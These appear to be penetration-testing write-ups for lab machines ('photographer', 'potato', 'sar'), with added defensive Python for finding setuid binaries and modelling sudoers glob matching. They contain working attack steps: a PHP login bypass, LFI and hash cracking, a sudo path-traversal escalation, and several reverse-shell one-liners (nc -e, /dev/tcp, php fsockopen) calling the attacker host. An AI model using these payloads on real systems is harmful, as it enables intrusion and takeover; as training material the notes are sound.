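    out = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue                      # symlinks never carry the bit
        if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        sev = "critical" if canonical_name(p) in DANGEROUS_WHEN_SUID else "review"
        out.append((p, sev))
    return out


def walk_suid(root):
    """`find ROOT -perm -u=s -type f` done in Python, then classified."""
    paths = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return suid_findings(paths)


def build_demo():
    """Constructed fixture: a setuid 'php7.2', a setuid 'ping' and a plain 'readme'."""
    root = tempfile.mkdtemp()
    for name, mode in (("php7.2", 0o4755), ("ping", 0o4755), ("readme", 0o644)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("\n")
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    for path, severity in walk_suid(build_demo()):
        print("%-8s %s" % (severity, path))
```

On the box the remediation is `chmod u-s /usr/bin/php7.2`; an interpreter never needs the setuid bit, and the distribution package does not ship it that way.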
![Img](../FILES/photographer/img-20220814171532.png)

Running it gives us the result directly

![Img](../FILES/photographer/img-20220814172034.png)

We now have root privileges

![Img](../FILES/photographer/img-20220814172119.png)

Privilege escalation successful
--------------------------------------------------------------------------------
/Target Notes/potato.md:
--------------------------------------------------------------------------------
# potato
## Information gathering
### Port scan
#### NMAP
All ports
```
┌──(aaron㉿aacai)-[~/Downloads/potato]
└─$ sudo nmap -p- 192.168.146.62
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:29 HKT
Nmap scan report for 192.168.146.62
Host is up (0.00025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2112/tcp open  kip
MAC Address: 00:0C:29:FB:BC:B1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds

```
Specified ports
```
┌──(aaron㉿aacai)-[~/Downloads/potato]
└─$ sudo nmap -p22,80,2112 192.168.146.62
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:30 HKT
Nmap scan report for 192.168.146.62
Host is up (0.00049s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2112/tcp open  kip
MAC Address: 00:0C:29:FB:BC:B1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds

┌──(aaron㉿aacai)-[~/Downloads/potato]
└─$ sudo nmap -p22,80,2112 -sV -A 192.168.146.62
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:30 HKT
Nmap scan report for 192.168.146.62
Host is up (0.00035s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
MAC Address: 00:0C:29:FB:BC:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.146.62

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds

```
### FTP enumeration
nmap showed that anonymous FTP login is allowed on port 2112, so log in and see whether the listed files can be downloaded
```
└─$ ftp 192.168.146.62 2112
Connected to 192.168.146.62.
220 ProFTPD Server (Debian) [::ffff:192.168.146.62]
Name (192.168.146.62:aaron): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.146.50 !
230-
230-The local time is: Fri Jul 29 07:34:13 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44960|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||53662|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
   901       11.45 MiB/s 
226 Transfer complete
901 bytes received in 00:00 (1.85 MiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||54469|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
    54        1.19 MiB/s 
226 Transfer complete
54 bytes received in 00:00 (108.06 KiB/s)
ftp> exit
221 Goodbye.
```
Both files can be downloaded; look at their contents
```
└─$ cat welcome.msg
Welcome, archive user %U@%R !

The local time is: %T

┌──(aaron㉿aacai)-[~/Desktop/potato]
└─$ cat index.php.bak
            Go to the dashboard";
            setcookie('pass', $pass, time() + 365*24*3600);
        }else{
            echo "
                Bad login/password!
                Return to the login page
            ";
        }
        exit();
    }
?>
    Login
```
index.php.bak is the PHP source of the login page, and it hard-codes $pass=potato
### Web page information gathering
The page itself shows only two lines of text and a picture of a potato
![Img](../FILES/potato/img-20220729153814.png)

Try directory enumeration
```
└─$ dirsearch -u "192.168.146.62"

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/aaron/.dirsearch/reports/192.168.146.62_22-07-29_15-38-50.txt

Error Log: /home/aaron/.dirsearch/logs/errors-22-07-29_15-38-50.log

Target: http://192.168.146.62/

[15:38:50] Starting: 
[15:38:56] 301 -  316B  - /admin  ->  http://192.168.146.62/admin/
[15:38:56] 200 -  466B  - /admin/
[15:38:56] 200 -  466B  - /admin/?/login
[15:38:57] 200 -  466B  - /admin/index.php
[15:38:57] 200 -    1KB - /admin/logs/
[15:39:10] 200 -  245B  - /index.php
[15:39:10] 200 -  245B  - /index.php/login/

```
There is an admin directory; view the page source
![Img](../FILES/potato/img-20220729154016.png)
The layout is the same as the .bak we downloaded at the start

Analyse the source
```
            Go to the dashboard";
            setcookie('pass', $pass, time() + 365*24*3600);
        }else{
            echo "
                Bad login/password!
                Return to the login page
            ";
        }
        exit();
    }
?>
```
The login check uses strcmp() to compare the submitted password with $password, and we need that comparison to yield 0. The OWASP paper https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf describes the trick: in PHP 7 and earlier, strcmp() given an array instead of a string emits a warning and returns NULL, and NULL == 0 is true under loose comparison, so the check passes without knowing the password
![Img](../FILES/potato/img-20220729154958.png)
Normally the form submits username=admin&password=123456; sending password[] instead makes PHP receive an array rather than a string

Intercept the request in Burp, change the parameter and resend it, then look at the response

The first time I had not changed the password parameter name, so the response was still "bad user/password"
![Img](../FILES/potato/img-20220729160517.png)

Change the parameter name to password[] and resend
![Img](../FILES/potato/img-20220729160645.png)

This time the response says "welcome"; now forward the modified request from the proxy

![Img](../FILES/potato/img-20220729160750.png)

That takes us to dashboard.php

Look at the different pages

![Img](../FILES/potato/img-20220729161328.png)

![Img](../FILES/potato/img-20220729161341.png)

![Img](../FILES/potato/img-20220729161351.png)

![Img](../FILES/potato/img-20220729161404.png)
![Img](../FILES/potato/img-20220729161413.png)
![Img](../FILES/potato/img-20220729161419.png)

![Img](../FILES/potato/img-20220729161432.png)

The ping page echoes command output back to us

So there may well be an LFI here too; probe it step by step with Burp
![Img](../FILES/potato/img-20220729162150.png)

Sure enough, there is an LFI

The last line of the included file shows a password hash for webadmin; save it locally and crack it with john
```
┌──(aaron㉿aacai)-[~/Desktop/potato]
└─$ john passwd.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
dragon           (webadmin)
1g 0:00:00:00 DONE 2/3 (2022-07-29 16:25) 33.33g/s 42000p/s 42000c/s 42000C/s 123456..larry
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(aaron㉿aacai)-[~/Desktop/potato]
└─$ 

```
It cracks immediately: webadmin / dragon
## Gaining a foothold
Log in with SSH
```
webadmin@serv:~$ ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fb:bc:b1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.62/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 68449sec preferred_lft 68449sec
    inet6 fe80::20c:29ff:fefb:bcb1/64 scope link 
       valid_lft forever preferred_lft forever
webadmin@serv:~$ whoami
webadmin
webadmin@serv:~$ ls
user.txt
webadmin@serv:~$ cat user.txt
TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)
webadmin@serv:~$ 
```
We have the user flag

List the home directory
```
webadmin@serv:~$ ls -al
total 32
drwxr-xr-x 3 webadmin webadmin 4096 Aug  2  2020 .
drwxr-xr-x 4 root     root     4096 Aug  2  2020 ..
-rw------- 1 webadmin webadmin  357 Aug  2  2020 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug  2  2020 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug  2  2020 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug  2  2020 .cache
-rw-r--r-- 1 webadmin webadmin  807 Aug  2  2020 .profile
-rw------- 1 webadmin root       69 Aug  2  2020 user.txt
webadmin@serv:~$ 
```
Look at .bash_history
```
webadmin@serv:~$ cat .bash_history
ls
exit
ls
sudo -l
exit
sudo -l
exit
sudo -l
exit
ls
sudo -l
sudo /bin/cat /etc/passwd
sudo /bin/cat /etc/passwd ; ls /root
exit
sudo -l
mkdir notes
exit
ls
cd ..
sudi -l
sudo -l
sudo /bin/ls /root/notes/test.txt
sudo /bin/ls /root/notes/test.txt /root
exit
sudo /bin/nice /root/notes/
sudo /bin/nice /root/notes/*
ls
exit
sudo /bin/nice /root/notes/*
exit
```
The history shows this user has been using sudo, so the account has some sudo rights; check them with sudo -l
```
webadmin@serv:~$ sudo -l
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$ 

```
This says webadmin may run /bin/nice as root on anything under /notes/
![Img](../FILES/potato/img-20220729163028.png)
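Why that rule is weaker than it looks, as an added example (not from the writeup): sudo checks a command's arguments against the sudoers argument pattern with fnmatch(3) and no FNM_PATHNAME, so the `*` in `/notes/*` also matches `/` and `..`, and the argument string is never canonicalised before the match. Python's fnmatch uses the same `*` semantics, so the model below reproduces sudo's decision and then normalises the path to show where the command really points. The rule and the paths are the ones from this box; nothing here invokes sudo.

```python
"""Model of sudo's argument matching for `(ALL : ALL) /bin/nice /notes/*`.

Added example, not part of the potato writeup. Reproduces the decision
sudo makes (exact command match plus fnmatch on the raw argument string)
and contrasts it with where the argument actually resolves.
"""
import fnmatch
import posixpath

SUDOERS_RULE = ("/bin/nice", "/notes/*")   # (command, argument pattern) from sudo -l


def sudoers_allows(rule, command, args):
    """sudo's check: the command must match exactly, the argument string via fnmatch.

    fnmatch.fnmatchcase, like fnmatch(3) with flags=0, lets '*' run across
    '/' and '..', so no path structure is enforced.
    """
    rule_cmd, rule_args = rule
    return command == rule_cmd and fnmatch.fnmatchcase(args, rule_args)


def real_target(args):
    """Where the kernel resolves the argument to (symlinks not considered)."""
    return posixpath.normpath(args)


def escapes_prefix(prefix, path):
    """True when the normalised path lies outside `prefix`."""
    real = real_target(path)
    prefix = posixpath.normpath(prefix)
    return not (real == prefix or real.startswith(prefix + "/"))


def classify(rule, command, args):
    """Return (allowed_by_sudo, real_target, escapes_intended_dir)."""
    intended_dir = posixpath.dirname(rule[1])          # "/notes"
    return (sudoers_allows(rule, command, args),
            real_target(args),
            escapes_prefix(intended_dir, args))


def safe_rule_check(rule, command, args):
    """What a wrapper script listed in sudoers instead of the glob should do:
    refuse traversal components and anything that normalises outside /notes."""
    allowed, _, escaped = classify(rule, command, args)
    return allowed and not escaped and ".." not in args.split("/")


if __name__ == "__main__":
    for arg in ("/notes/id.sh", "/notes/../home/webadmin/nc.sh"):
        allowed, real, escaped = classify(SUDOERS_RULE, "/bin/nice", arg)
        print("%-32s sudo allows=%s real=%s escapes=%s safe=%s" % (
            arg, allowed, real, escaped,
            safe_rule_check(SUDOERS_RULE, "/bin/nice", arg)))
```

A tighter rule names the scripts individually (`/bin/nice /notes/id.sh`) or points at a wrapper that performs the safe_rule_check logic; a sudoers glob cannot express "no traversal".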
The files in there can only be read as root, so run one of them through `nice` instead:
```
webadmin@serv:/notes$ sudo /bin/nice /notes/id.sh
uid=0(root) gid=0(root) groups=0(root)
webadmin@serv:/notes$

```
So `nice` simply executes whatever it is given, as root. Since the pattern only constrains the text of the argument, write a reverse-shell script in the home directory and reach it through `/notes/..`:

```
webadmin@serv:~$ echo "nc -e /bin/sh 192.168.146.50 4444" >> nc.sh
webadmin@serv:~$ ls
nc.sh  user.txt
webadmin@serv:~$ pwd
/home/webadmin
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/nc.sh
/bin/nice: ‘/notes/../home/webadmin/nc.sh’: Permission denied
webadmin@serv:~$ chmod 777 nc.sh
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/nc.sh

```
`nice` executes the file directly rather than through a shell, so the first attempt fails until the execute bit is set (`chmod +x` is enough; `777` is more than needed). The script has no shebang, so the kernel refuses it with ENOEXEC and glibc's `execvp` falls back to running it with `/bin/sh`, which is why the bare one-liner still works. Note that the target's `nc` supports `-e`; not every netcat build does.

With a listener started on the attacker machine beforehand, the shell arrives as root:

```
┌──(aaron㉿aacai)-[~/Desktop/potato]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.146.50] from (UNKNOWN) [192.168.146.62] 38818
id
uid=0(root) gid=0(root) groups=0(root)
ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fb:bc:b1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.62/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 67885sec preferred_lft 67885sec
    inet6 fe80::20c:29ff:fefb:bcb1/64 scope link
       valid_lft forever preferred_lft forever
cd
ls
root.txt
snap
cat root.txt
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==
whoami
root
```
![Img](../FILES/potato/img-20220729163655.png)

--------------------------------------------------------------------------------
/Target Notes/sar.md:
--------------------------------------------------------------------------------
# sar-192.168.146.58
## Information gathering
### Full port scan
```
└─$ sudo nmap -p- 192.168.146.58
[sudo] password for aacai:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-21 11:32 HKT
Nmap scan report for 192.168.146.58
Host is up (0.00012s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:8A:FF:1A (VMware)
```
### Targeted port scan
```
└─$ sudo nmap -p80 -sV -A 192.168.146.58
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-21 11:32 HKT
Nmap scan report for 192.168.146.58
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:8A:FF:1A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.146.58

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds

```
Only port 80 is open, so everything has to go through the web server.
### Web information gathering
```
┌──(aacai㉿kali)-[~/Desktop/gooann/sar-192.168.146.58]
└─$ nikto -h 192.168.146.58
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.58
+ Target Hostname:    192.168.146.58
+ Target Port:        80
+ Start Time:         2022-07-21 11:33:47 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-07-21 11:34:37 (GMT8) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(aacai㉿kali)-[~/Desktop/gooann/sar-192.168.146.58]
└─$
```
```
└─$ dirb http://192.168.146.58

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jul 21 11:34:48 2022
URL_BASE: http://192.168.146.58/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.146.58/ ----
+ http://192.168.146.58/index.html (CODE:200|SIZE:10918)
+ http://192.168.146.58/phpinfo.php (CODE:200|SIZE:95507)
+ http://192.168.146.58/robots.txt (CODE:200|SIZE:9)
+ http://192.168.146.58/server-status (CODE:403|SIZE:279)

-----------------
END_TIME: Thu Jul 21 11:34:50 2022
DOWNLOADED: 4612 - FOUND: 4

```
### Web page information gathering
![IMG](../FILES/sar/img-20220721113820.png)
![IMG](../FILES/sar/img-20220721113828.png)

`phpinfo.php` is left exposed and gives away the PHP version (7.1) along with paths and loaded modules, and the 9-byte `robots.txt` is worth reading. Checking the version banners against Exploit-DB first:

```
└─$ searchsploit apache 2.4.29
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                               |  Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution                                                              | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner                                                            | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                                        | linux/local/46676.php
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service                                                                          | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                         | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                   | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                   | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal                                                          | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing                                                                            | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal                                                                          | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)                                                                    | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                 | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                 | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)                                                                 | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution                                             | linux/remote/34.pl
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

└─$ searchsploit php 7.1 | grep -v "WordPress\|Drupal\|.php"
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                               |  Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution                                                                      | windows/remote/24961.html
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

```
None of the Apache hits apply: they are for mod_ssl, Tomcat, CXF and other Apache projects, and the only entry for httpd itself (46676, the `apache2ctl graceful`/logrotate privilege escalation) needs a local shell first. The PHP 7.1 search is empty too, so the version banners are a dead end and the application behind `robots.txt` is the real target.
![IMG](../FILES/sar/img-20220721114624.png)
![IMG](../FILES/sar/img-20220721114631.png)

![IMG](../FILES/sar/img-20220721114822.png)
![IMG](../FILES/sar/img-20220721114914.png)
The screenshots lead to `/sar2HTML/`. The installed release, sar2html 3.2.1, has an unauthenticated command injection in its `plot` parameter; the Exploit-DB script below wraps it in a command prompt:
>https://www.exploit-db.com/exploits/49344
```
└─$ python3 exploit.py                                                                                                  1 ⨯
Enter The url => http://192.168.146.58/sar2HTML/
Command => whoami
www-data

Command => nc 192.168.146.64 4444 -e /bin/bash

Command => nc 192.168.146.63 4444 -e /bin/bash

Command => bash -i >& /dev/tcp/192.168.146.63/4444

Command => bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.63%2F4444%200%3E%261

Command => whoami
www-data

Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE

Command => nc
Command => php%20-r%20'%24sock%3Dfsockopen(%22192.168.146.63%22%2C4444)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B'
```
Code execution as `www-data` is confirmed on the first command, but the first few reverse-shell attempts fail for different reasons: the first one targets the wrong address (`.64`; the attacker box is `.63`), the target's `nc` most likely lacks `-e`, and `bash -i >& /dev/tcp/...` depends on bash while the injected command is run by `/bin/sh`. The exploit also sends the command in a GET parameter, so characters such as `&`, `>` and spaces must be URL-encoded or the request is cut at the first `&`. A reverse shell prints nothing back in the page either way, so an empty response is not a failure; the listener is. The URL-encoded `php -r` `fsockopen` payload on the last line is the one that connects back.
### Privilege escalation
```
└─$ nc -nvlp 4444                                                                                                       1 ⨯
listening on [any] 4444 ...
connect to [192.168.146.63] from (UNKNOWN) [192.168.146.58] 48596
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@sar:/var/www/html/sar2HTML$ ls -al
ls -al
total 160
drwxr-xr-x 4 www-data www-data  4096 Oct 20  2019 .
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 ..
-rwxr-xr-x 1 www-data www-data 35149 Mar 14  2019 LICENSE
-rwxr-xr-x 1 www-data www-data 53446 Mar 19  2019 index.php
-rwxr-xr-x 1 www-data www-data 53165 Mar 19  2019 sar2html
drwxr-xr-x 3 www-data www-data  4096 Oct 20  2019 sarDATA
drwxr-xr-x 3 www-data www-data  4096 Mar 19  2019 sarFILE

www-data@sar:/var/www/html/sar2HTML$ cd /tmp
cd /tmp
www-data@sar:/tmp$ ls -al
ls -al
total 8
drwxrwxrwt  2 root root 4096 Jul 21 09:05 .
drwxr-xr-x 24 root root 4096 Oct 20  2019 ..
www-data@sar:/tmp$ wget http://192.168.146.63/linpeas.sh
wget http://192.168.146.63/linpeas.sh
--2022-07-21 09:34:54--  http://192.168.146.63/linpeas.sh
Connecting to 192.168.146.63:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776967 (759K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 758.76K  --.-KB/s    in 0.006s

2022-07-21 09:34:54 (116 MB/s) - 'linpeas.sh' saved [776967/776967]

```
`python` is not installed, so `script -qc /bin/bash /dev/null` is used to get a pty instead. `linpeas.sh` is fetched from a web server on the attacker machine.
#### Key findings
The exploit suggester section of the linpeas output:
```
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter he
ap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

```
These are rated on kernel and distribution version alone and none has been confirmed; PwnKit and Baron Samedit are worth trying only if the configuration route fails. Further down, the system crontab is far more interesting:
```
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
